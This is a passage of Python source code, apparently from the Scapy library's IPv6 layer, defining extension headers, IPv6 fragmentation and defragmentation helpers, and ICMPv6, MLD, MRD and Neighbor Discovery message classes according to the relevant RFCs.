payload of the upper layer provided as a string """ ph6 = PseudoIPv6() ph6.nh = nh rthdr = 0 hahdr = 0 final_dest_addr_found = 0 while u is not None and not isinstance(u, IPv6): if (isinstance(u, IPv6ExtHdrRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[-1] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[0] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and isinstance(u.options[0], HAO)): hahdr = u.options[0].hoa u = u.underlayer if u is None: warning("No IPv6 underlayer to compute checksum. Leaving null.") return 0 if hahdr: ph6.src = hahdr else: ph6.src = u.src if rthdr: ph6.dst = rthdr else: ph6.dst = u.dst ph6.uplen = len(p) ph6s = raw(ph6) return checksum(ph6s + p) ############################################################################# ############################################################################# # Extension Headers # ############################################################################# ############################################################################# # Inherited by all extension header classes class _IPv6ExtHdr(_IPv6GuessPayload, Packet): name = 'Abstract IPv6 Option Header' aliastypes = [IPv6, IPerror6] # TODO ... # IPv6 options for Extension Headers # _hbhopts = {0x00: "Pad1", 0x01: "PadN", 0x04: "Tunnel Encapsulation Limit", 0x05: "Router Alert", 0x06: "Quick-Start", 0xc2: "Jumbo Payload", 0xc9: "Home Address Option"} class _OTypeField(ByteEnumField): """ Modified BytEnumField that displays information regarding the IPv6 option based on its option type value (What should be done by nodes that process the option if they do not understand it ...) It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options """ pol = {0x00: "00: skip", 0x40: "01: discard", 0x80: "10: discard+ICMP", 0xC0: "11: discard+ICMP not mcast"} enroutechange = {0x00: "0: Don't change en-route", 0x20: "1: May change en-route"} def i2repr(self, pkt, x): s = self.i2s.get(x, repr(x)) polstr = self.pol[(x & 0xC0)] enroutechangestr = self.enroutechange[(x & 0x20)] return "%s [%s, %s]" % (s, polstr, enroutechangestr) class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option name = "Scapy6 Unknown Option" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # By default, no alignment requirement """ As specified in section 4.2 of RFC 2460, every options has an alignment requirement usually expressed xn+y, meaning the Option Type must appear at an integer multiple of x octest from the start of the header, plus y octet. That function is provided the current position from the start of the header and returns required padding length. """ return 0 @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt: o = orb(_pkt[0]) # Option type if o in _hbhoptcls: return _hbhoptcls[o] return cls def extract_padding(self, p): return b"", p class Pad1(Packet): # IPv6 Hop-By-Hop Option name = "Pad1" fields_desc = [_OTypeField("otype", 0x00, _hbhopts)] def alignment_delta(self, curpos): # No alignment requirement return 0 def extract_padding(self, p): return b"", p class PadN(Packet): # IPv6 Hop-By-Hop Option name = "PadN" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # No alignment requirement return 0 def extract_padding(self, p): return b"", p class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option name = "Router Alert" fields_desc = [_OTypeField("otype", 0x05, _hbhopts), ByteField("optlen", 2), ShortEnumField("value", None, {0: "Datagram contains a MLD message", 1: "Datagram contains RSVP message", 2: "Datagram contains an Active Network message", # noqa: E501 68: "NSIS NATFW NSLP", 69: "MPLS OAM", 65535: "Reserved"})] # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml def alignment_delta(self, curpos): # alignment requirement : 2n+0 x = 2 y = 0 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class Jumbo(Packet): # IPv6 Hop-By-Hop Option name = "Jumbo Payload" fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), ByteField("optlen", 4), IntField("jumboplen", None)] def alignment_delta(self, curpos): # alignment requirement : 4n+2 x = 4 y = 2 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class HAO(Packet): # IPv6 Destination Options Header Option name = "Home Address Option" fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), ByteField("optlen", 16), IP6Field("hoa", "::")] def alignment_delta(self, curpos): # alignment requirement : 8n+6 x = 8 y = 6 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p _hbhoptcls = {0x00: Pad1, 0x01: PadN, 0x05: RouterAlert, 0xC2: Jumbo, 0xC9: HAO} # Hop-by-Hop Extension Header # class _OptionsField(PacketListField): __slots__ = ["curpos"] def __init__(self, name, default, cls, curpos, *args, **kargs): self.curpos = curpos PacketListField.__init__(self, name, default, cls, *args, **kargs) def i2len(self, pkt, i): return len(self.i2m(pkt, i)) def i2m(self, pkt, x): autopad = None try: autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field except Exception: autopad = 1 if not autopad: return b"".join(map(str, x)) curpos = self.curpos s = b"" for p in x: d = p.alignment_delta(curpos) curpos += d if d == 1: s += raw(Pad1()) elif d != 0: s += raw(PadN(optdata=b'\x00' * (d - 2))) pstr = raw(p) curpos += len(pstr) s += pstr # Let's make the class including our option field # a multiple of 8 octets long d = curpos % 8 if d == 0: return s d = 8 - d if d == 1: s += raw(Pad1()) elif d != 0: s += raw(PadN(optdata=b'\x00' * (d - 2))) return s def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) class _PhantomAutoPadField(ByteField): def addfield(self, pkt, s, val): return s def getfield(self, pkt, s): return s, 1 def i2repr(self, pkt, x): if x: return "On" return "Off" class IPv6ExtHdrHopByHop(_IPv6ExtHdr): name = "IPv6 Extension Header - Hop-by-Hop Options Header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 0}} # Destination Option Header # class IPv6ExtHdrDestOpt(_IPv6ExtHdr): name = "IPv6 Extension Header - Destination Options Header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 60}} # Routing Header # class IPv6ExtHdrRouting(_IPv6ExtHdr): name = "IPv6 Option Header Routing" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, count_of="addresses", fmt="B", adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 ByteField("type", 0), ByteField("segleft", None), BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501 IP6ListField("addresses", [], length_from=lambda pkt: 8 * pkt.len)] overload_fields = {IPv6: {"nh": 43}} def post_build(self, pkt, pay): if self.segleft is None: pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] return _IPv6ExtHdr.post_build(self, pkt, pay) # Segment Routing Header # # This implementation is based on draft 06, available at: # https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 class IPv6ExtHdrSegmentRoutingTLV(Packet): name = "IPv6 Option Header Segment Routing - Generic TLV" fields_desc = [ByteField("type", 0), ByteField("len", 0), ByteField("reserved", 0), ByteField("flags", 0), StrLenField("value", "", length_from=lambda pkt: pkt.len)] def extract_padding(self, p): return b"", p registered_sr_tlv = {} @classmethod def register_variant(cls): cls.registered_sr_tlv[cls.type.default] = cls @classmethod def dispatch_hook(cls, pkt=None, *args, **kargs): if pkt: tmp_type = orb(pkt[0]) return cls.registered_sr_tlv.get(tmp_type, cls) return cls class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Ingress Node TLV" fields_desc = [ByteField("type", 1), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), IP6Field("ingress_node", "::1")] class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Egress Node TLV" fields_desc = [ByteField("type", 2), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), IP6Field("egress_node", "::1")] class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Padding TLV" fields_desc = [ByteField("type", 4), FieldLenField("len", None, length_of="padding", fmt="B"), StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): name = "IPv6 Option Header Segment Routing" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteField("type", 4), ByteField("segleft", None), ByteField("lastentry", None), BitField("unused1", 0, 1), BitField("protected", 0, 1), BitField("oam", 0, 1), BitField("alert", 0, 1), BitField("hmac", 0, 1), BitField("unused2", 0, 3), ShortField("tag", 0), IP6ListField("addresses", ["::1"], count_from=lambda pkt: (pkt.lastentry + 1)), PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV, length_from=lambda pkt: 8 * pkt.len - 16 * ( pkt.lastentry + 1 ))] overload_fields = {IPv6: {"nh": 43}} def post_build(self, pkt, pay): if self.len is None: # The extension must be align on 8 bytes tmp_mod = (len(pkt) - 8) % 8 if tmp_mod == 1: warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte!") elif tmp_mod >= 2: # Add the padding extension tmp_pad = b"\x00" * (tmp_mod - 2) tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad) pkt += raw(tlv) tmp_len = (len(pkt) - 8) // 8 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] if self.segleft is None: tmp_len = len(self.addresses) if tmp_len: tmp_len -= 1 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] if self.lastentry is None: lastentry = len(self.addresses) if lastentry == 0: warning( "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" ) else: lastentry -= 1 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] return _IPv6ExtHdr.post_build(self, pkt, pay) # Fragmentation Header # class IPv6ExtHdrFragment(_IPv6ExtHdr): name = "IPv6 Extension Header - Fragmentation header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), BitField("res1", 0, 8), BitField("offset", 0, 13), BitField("res2", 0, 2), BitField("m", 0, 1), IntField("id", None)] overload_fields = {IPv6: {"nh": 44}} def defragment6(packets): """ Performs defragmentation of a list of IPv6 packets. Packets are reordered. Crap is dropped. What lacks is completed by 'X' characters. """ # Remove non fragments lst = [x for x in packets if IPv6ExtHdrFragment in x] if not lst: return [] id = lst[0][IPv6ExtHdrFragment].id llen = len(lst) lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] if len(lst) != llen: warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 llen = len(lst) # reorder fragments res = [] while lst: min_pos = 0 min_offset = lst[0][IPv6ExtHdrFragment].offset for p in lst: cur_offset = p[IPv6ExtHdrFragment].offset if cur_offset < min_offset: min_pos = 0 min_offset = cur_offset res.append(lst[min_pos]) del(lst[min_pos]) # regenerate the fragmentable part fragmentable = b"" for p in res: q = p[IPv6ExtHdrFragment] offset = 8 * q.offset if offset != len(fragmentable): warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 fragmentable += b"X" * (offset - len(fragmentable)) fragmentable += raw(q.payload) # Regenerate the unfragmentable part. q = res[0] nh = q[IPv6ExtHdrFragment].nh q[IPv6ExtHdrFragment].underlayer.nh = nh q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) del q[IPv6ExtHdrFragment].underlayer.payload q /= conf.raw_layer(load=fragmentable) del(q.plen) return IPv6(raw(q)) def fragment6(pkt, fragSize): """ Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected maximum size of fragments (MTU). The list of packets is returned. If packet does not contain an IPv6ExtHdrFragment class, it is returned in result list. """ pkt = pkt.copy() if IPv6ExtHdrFragment not in pkt: # TODO : automatically add a fragment before upper Layer # at the moment, we do nothing and return initial packet # as single element of a list return [pkt] # If the payload is bigger than 65535, a Jumbo payload must be used, as # an IPv6 packet can't be bigger than 65535 bytes. if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 return [] s = raw(pkt) # for instantiation to get upper layer checksum right if len(s) <= fragSize: return [pkt] # Fragmentable part : fake IPv6 for Fragmentable part length computation fragPart = pkt[IPv6ExtHdrFragment].payload tmp = raw(IPv6(src="::1", dst="::1") / fragPart) fragPartLen = len(tmp) - 40 # basic IPv6 header length fragPartStr = s[-fragPartLen:] # Grab Next Header for use in Fragment Header nh = pkt[IPv6ExtHdrFragment].nh # Keep fragment header fragHeader = pkt[IPv6ExtHdrFragment] del fragHeader.payload # detach payload # Unfragmentable Part unfragPartLen = len(s) - fragPartLen - 8 unfragPart = pkt del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload # Cut the fragmentable part to fit fragSize. Inner fragments have # a length that is an integer multiple of 8 octets. last Frag MTU # can be anything below MTU lastFragSize = fragSize - unfragPartLen - 8 innerFragSize = lastFragSize - (lastFragSize % 8) if lastFragSize <= 0 or innerFragSize == 0: warning("Provided fragment size value is too low. " + "Should be more than %d" % (unfragPartLen + 8)) return [unfragPart / fragHeader / fragPart] remain = fragPartStr res = [] fragOffset = 0 # offset, incremeted during creation fragId = random.randint(0, 0xffffffff) # random id ... if fragHeader.id is not None: # ... except id provided by user fragId = fragHeader.id fragHeader.m = 1 fragHeader.id = fragId fragHeader.nh = nh # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... while True: if (len(remain) > lastFragSize): tmp = remain[:innerFragSize] remain = remain[innerFragSize:] fragHeader.offset = fragOffset # update offset fragOffset += (innerFragSize // 8) # compute new one if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) res.append(tempo) else: fragHeader.offset = fragOffset # update offSet fragHeader.m = 0 if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) res.append(tempo) break return res # AH Header # # class _AHFieldLenField(FieldLenField): # def getfield(self, pkt, s): # l = getattr(pkt, self.fld) # l = (l*8)-self.shift # i = self.m2i(pkt, s[:l]) # return s[l:],i # class _AHICVStrLenField(StrLenField): # def i2len(self, pkt, x): # class IPv6ExtHdrAH(_IPv6ExtHdr): # name = "IPv6 Extension Header - AH" # fields_desc = [ ByteEnumField("nh", 59, ipv6nh), # _AHFieldLenField("len", None, "icv"), # ShortField("res", 0), # IntField("spi", 0), # IntField("sn", 0), # _AHICVStrLenField("icv", None, "len", shift=2) ] # overload_fields = {IPv6: { "nh": 51 }} # def post_build(self, pkt, pay): # if self.len is None: # pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:] # if self.segleft is None: # pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:] # return _IPv6ExtHdr.post_build(self, pkt, pay) # ESP Header # # class IPv6ExtHdrESP(_IPv6extHdr): # name = "IPv6 Extension Header - ESP" # fields_desc = [ IntField("spi", 0), # IntField("sn", 0), # # there is things to extract from IKE work # ] # overloads_fields = {IPv6: { "nh": 50 }} ############################################################################# ############################################################################# # ICMPv6* Classes # ############################################################################# ############################################################################# icmp6typescls = {1: "ICMPv6DestUnreach", 2: "ICMPv6PacketTooBig", 3: "ICMPv6TimeExceeded", 4: "ICMPv6ParamProblem", 128: "ICMPv6EchoRequest", 129: "ICMPv6EchoReply", 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 131: "ICMPv6MLReport", 132: "ICMPv6MLDone", 133: "ICMPv6ND_RS", 134: "ICMPv6ND_RA", 135: "ICMPv6ND_NS", 136: "ICMPv6ND_NA", 137: "ICMPv6ND_Redirect", # 138: Do Me - RFC 2894 - Seems painful 139: "ICMPv6NIQuery", 140: "ICMPv6NIReply", 141: "ICMPv6ND_INDSol", 142: "ICMPv6ND_INDAdv", 143: "ICMPv6MLReport2", 144: "ICMPv6HAADRequest", 145: "ICMPv6HAADReply", 146: "ICMPv6MPSol", 147: "ICMPv6MPAdv", # 148: Do Me - SEND related - RFC 3971 # 149: Do Me - SEND related - RFC 3971 151: "ICMPv6MRD_Advertisement", 152: "ICMPv6MRD_Solicitation", 153: "ICMPv6MRD_Termination", } icmp6typesminhdrlen = {1: 8, 2: 8, 3: 8, 4: 8, 128: 8, 129: 8, 130: 24, 131: 24, 132: 24, 133: 8, 134: 16, 135: 24, 136: 24, 137: 40, # 139: # 140 141: 8, 142: 8, 143: 8, 144: 8, 145: 8, 146: 8, 147: 8, 151: 8, 152: 4, 153: 4 } icmp6types = {1: "Destination unreachable", 2: "Packet too big", 3: "Time exceeded", 4: "Parameter problem", 100: "Private Experimentation", 101: "Private Experimentation", 128: "Echo Request", 129: "Echo Reply", 130: "MLD Query", 131: "MLD Report", 132: "MLD Done", 133: "Router Solicitation", 134: "Router Advertisement", 135: "Neighbor Solicitation", 136: "Neighbor Advertisement", 137: "Redirect Message", 138: "Router Renumbering", 139: "ICMP Node Information Query", 140: "ICMP Node Information Response", 141: "Inverse Neighbor Discovery Solicitation Message", 142: "Inverse Neighbor Discovery Advertisement Message", 143: "MLD Report Version 2", 144: "Home Agent Address Discovery Request Message", 145: "Home Agent Address Discovery Reply Message", 146: "Mobile Prefix Solicitation", 147: "Mobile Prefix Advertisement", 148: "Certification Path Solicitation", 149: "Certification Path Advertisement", 151: "Multicast Router Advertisement", 152: "Multicast Router Solicitation", 153: "Multicast Router Termination", 200: "Private Experimentation", 201: "Private Experimentation"} class _ICMPv6(Packet): name = "ICMPv6 dummy class" overload_fields = {IPv6: {"nh": 58}} def post_build(self, p, pay): p += pay if self.cksum is None: chksum = in6_chksum(58, self.underlayer, p) p = p[:2] + struct.pack("!H", chksum) + p[4:] return p def hashret(self): return self.payload.hashret() def answers(self, other): # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... if (isinstance(self.underlayer, IPerror6) or isinstance(self.underlayer, _IPv6ExtHdr) and isinstance(other, _ICMPv6)): if not ((self.type == other.type) and (self.code == other.code)): return 0 return 1 return 0 class _ICMPv6Error(_ICMPv6): name = "ICMPv6 errors dummy class" def guess_payload_class(self, p): return IPerror6 class ICMPv6Unknown(_ICMPv6): name = "Scapy6 ICMPv6 fallback class" fields_desc = [ByteEnumField("type", 1, icmp6types), ByteField("code", 0), XShortField("cksum", None), StrField("msgbody", "")] # RFC 2460 # class ICMPv6DestUnreach(_ICMPv6Error): name = "ICMPv6 Destination Unreachable" fields_desc = [ByteEnumField("type", 1, icmp6types), ByteEnumField("code", 0, {0: "No route to destination", 1: "Communication with destination administratively prohibited", # noqa: E501 2: "Beyond scope of source address", # noqa: E501 3: "Address unreachable", 4: "Port unreachable"}), XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused", 0)] class ICMPv6PacketTooBig(_ICMPv6Error): name = "ICMPv6 Packet Too Big" fields_desc = [ByteEnumField("type", 2, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("mtu", 1280)] class ICMPv6TimeExceeded(_ICMPv6Error): name = "ICMPv6 Time Exceeded" fields_desc = [ByteEnumField("type", 3, icmp6types), ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 1: "fragment reassembly time exceeded"}), # noqa: E501 XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused", 0)] # The default pointer value is set to the next header field of # the encapsulated IPv6 packet class ICMPv6ParamProblem(_ICMPv6Error): name = "ICMPv6 Parameter Problem" fields_desc = [ByteEnumField("type", 4, icmp6types), ByteEnumField( "code", 0, {0: "erroneous header field encountered", 1: "unrecognized Next Header type encountered", 2: "unrecognized IPv6 option encountered", 3: "first fragment has incomplete header chain"}), XShortField("cksum", None), IntField("ptr", 6)] class ICMPv6EchoRequest(_ICMPv6): name = "ICMPv6 Echo Request" fields_desc = [ByteEnumField("type", 128, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", 0), XShortField("seq", 0), StrField("data", "")] def mysummary(self): return self.sprintf("%name% (id: %id% seq: %seq%)") def hashret(self): return struct.pack("HH", self.id, self.seq) + self.payload.hashret() class ICMPv6EchoReply(ICMPv6EchoRequest): name = "ICMPv6 Echo Reply" type = 129 def answers(self, other): # We could match data content between request and reply. return (isinstance(other, ICMPv6EchoRequest) and self.id == other.id and self.seq == other.seq and self.data == other.data) # ICMPv6 Multicast Listener Discovery (RFC2710) # # tous les messages MLD sont emis avec une adresse source lien-locale # -> Y veiller dans le post_build si aucune n'est specifiee # La valeur de Hop-Limit doit etre de 1 # "and an IPv6 Router Alert option in a Hop-by-Hop Options # header. (The router alert option is necessary to cause routers to # examine MLD messages sent to multicast addresses in which the router # itself has no interest" class _ICMPv6ML(_ICMPv6): fields_desc = [ByteEnumField("type", 130, icmp6types), ByteField("code", 0), XShortField("cksum", None), ShortField("mrd", 0), ShortField("reserved", 0), IP6Field("mladdr", "::")] # general queries are sent to the link-scope all-nodes multicast # address ff02::1, with a multicast address field of 0 and a MRD of # [Query Response Interval] # Default value for mladdr is set to 0 for a General Query, and # overloaded by the user for a Multicast Address specific query # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Query" type = 130 mrd = 10000 # 10s for mrd mladdr = "::" overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Report" type = 131 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} def answers(self, query): """Check the query type""" return ICMPv6MLQuery in query # When a node ceases to listen to a multicast address on an interface, # it SHOULD send a single Done message to the link-scope all-routers # multicast address (FF02::2), carrying in its multicast address field # the address to which it is ceasing to listen # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Done" type = 132 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}} # Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # class ICMPv6MLQuery2(_ICMPv6): # RFC 3810 name = "MLDv2 - Multicast Listener Query" fields_desc = [ByteEnumField("type", 130, icmp6types), ByteField("code", 0), XShortField("cksum", None), ShortField("mrd", 10000), ShortField("reserved", 0), IP6Field("mladdr", "::"), BitField("Resv", 0, 4), BitField("S", 0, 1), BitField("QRV", 0, 3), ByteField("QQIC", 0), ShortField("sources_number", None), IP6ListField("sources", [], count_from=lambda pkt: pkt.sources_number)] # RFC8810 - 4. Message Formats overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} def post_build(self, packet, payload): """Compute the 'sources_number' field when needed""" if self.sources_number is None: srcnum = struct.pack("!H", len(self.sources)) packet = packet[:26] + srcnum + packet[28:] return _ICMPv6.post_build(self, packet, payload) class ICMPv6MLDMultAddrRec(Packet): name = "ICMPv6 MLDv2 - Multicast Address Record" fields_desc = [ByteField("rtype", 4), FieldLenField("auxdata_len", None, length_of="auxdata", fmt="B"), FieldLenField("sources_number", None, length_of="sources", adjust=lambda p, num: num // 16), IP6Field("dst", "::"), IP6ListField("sources", [], length_from=lambda p: 16 * p.sources_number), StrLenField("auxdata", "", length_from=lambda p: p.auxdata_len)] def default_payload_class(self, packet): """Multicast Address Record followed by another one""" return self.__class__ class ICMPv6MLReport2(_ICMPv6): # RFC 3810 name = "MLDv2 - Multicast Listener Report" fields_desc = [ByteEnumField("type", 143, icmp6types), ByteField("res", 0), XShortField("cksum", None), ShortField("reserved", 0), ShortField("records_number", None), PacketListField("records", [], ICMPv6MLDMultAddrRec, count_from=lambda p: p.records_number)] # RFC8810 - 4. Message Formats overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}} def post_build(self, packet, payload): """Compute the 'records_number' field when needed""" if self.records_number is None: recnum = struct.pack("!H", len(self.records)) packet = packet[:6] + recnum + packet[8:] return _ICMPv6.post_build(self, packet, payload) def answers(self, query): """Check the query type""" return isinstance(query, ICMPv6MLQuery2) # ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # # TODO: # - 04/09/06 troglocan : find a way to automatically add a router alert # option for all MRD packets. This could be done in a specific # way when IPv6 is the under layer with some specific keyword # like 'exthdr'. This would allow to keep compatibility with # providing IPv6 fields to be overloaded in fields_desc. # # At the moment, if user inserts an IPv6 Router alert option # none of the IPv6 default values of IPv6 layer will be set. class ICMPv6MRD_Advertisement(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Advertisement" fields_desc = [ByteEnumField("type", 151, icmp6types), ByteField("advinter", 20), XShortField("cksum", None), ShortField("queryint", 0), ShortField("robustness", 0)] overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:8], s[8:] class ICMPv6MRD_Solicitation(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Solicitation" fields_desc = [ByteEnumField("type", 152, icmp6types), ByteField("res", 0), XShortField("cksum", None)] overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] class ICMPv6MRD_Termination(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Termination" fields_desc = [ByteEnumField("type", 153, icmp6types), ByteField("res", 0), XShortField("cksum", None)] overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] # ICMPv6 Neighbor Discovery (RFC 2461) # icmp6ndopts = {1: "Source Link-Layer Address", 2: "Target Link-Layer Address", 3: "Prefix Information", 4: "Redirected Header", 5: "MTU", 6: "NBMA Shortcut Limit Option", # RFC2491 7: "Advertisement Interval Option", 8: "Home Agent Information Option", 9: "Source Address List", 10: "Target Address List", 11: "CGA Option", # RFC 3971 12: "RSA Signature Option", # RFC 3971 13: "Timestamp Option", # RFC 3971 14: "Nonce option", # RFC 3971 15: "Trust Anchor Option", # RFC 3971 16: "Certificate Option", # RFC 3971 17: "IP Address Option", # RFC 4068 18: "New Router Prefix Information Option", # RFC 4068 19: "Link-layer Address Option", # RFC 4068 20: "Neighbor Advertisement Acknowledgement Option", 21: "CARD Request Option", # RFC 4065/4066/4067 22: "CARD Reply Option", # RFC 4065/4066/4067 23: "MAP Option", # RFC 4140 24: "Route Information Option", # RFC 4191 25: "Recursive DNS Server Option", 26: "IPv6 Router Advertisement Flags Option" } icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr", 2: "ICMPv6NDOptDstLLAddr", 3: "ICMPv6NDOptPrefixInfo", 4: "ICMPv6NDOptRedirectedHdr", 5: "ICMPv6NDOptMTU", 6: "ICMPv6NDOptShortcutLimit", 7: "ICMPv6NDOptAdvInterval", 8: "ICMPv6NDOptHAInfo", 9: "ICMPv6NDOptSrcAddrList", 10: "ICMPv6NDOptTgtAddrList", # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py # 15: Do Me, # 16: Do Me, 17: "ICMPv6NDOptIPAddr", 18: "ICMPv6NDOptNewRtrPrefix", 19: "ICMPv6NDOptLLA", # 18: Do Me, # 19: Do Me, # 20: Do Me, # 21: Do Me, # 22: Do Me, 23: "ICMPv6NDOptMAP", 24: "ICMPv6NDOptRouteInfo", 25: "ICMPv6NDOptRDNSS", 26: "ICMPv6NDOptEFA", 31: "ICMPv6NDOptDNSSL" } icmp6ndraprefs = {0: "Medium (default)", 1: "High", 2: "Reserved", 3: "Low"} # RFC 4191 class _ICMPv6NDGuessPayload: name = "Dummy ND class that implements guess_payload_class()" def guess_payload_class(self, p): if len(p) > 1: return icmp6ndoptscls.get(orb(p[0]), Raw) # s/Raw/ICMPv6NDOptUnknown/g ? # noqa: E501 # Beginning of ICMPv6 Neighbor Discovery Options. class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" fields_desc = [ByteField("type", None), FieldLenField("len", None, length_of="data", fmt="B", adjust=lambda pkt, x: x + 2), StrLenField("data", "", length_from=lambda pkt: pkt.len - 2)] # NOTE: len includes type and len field. Expressed in unit of 8 bytes # TODO: Revoir le coup du ETHER_ANY class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" fields_desc = [ByteField("type", 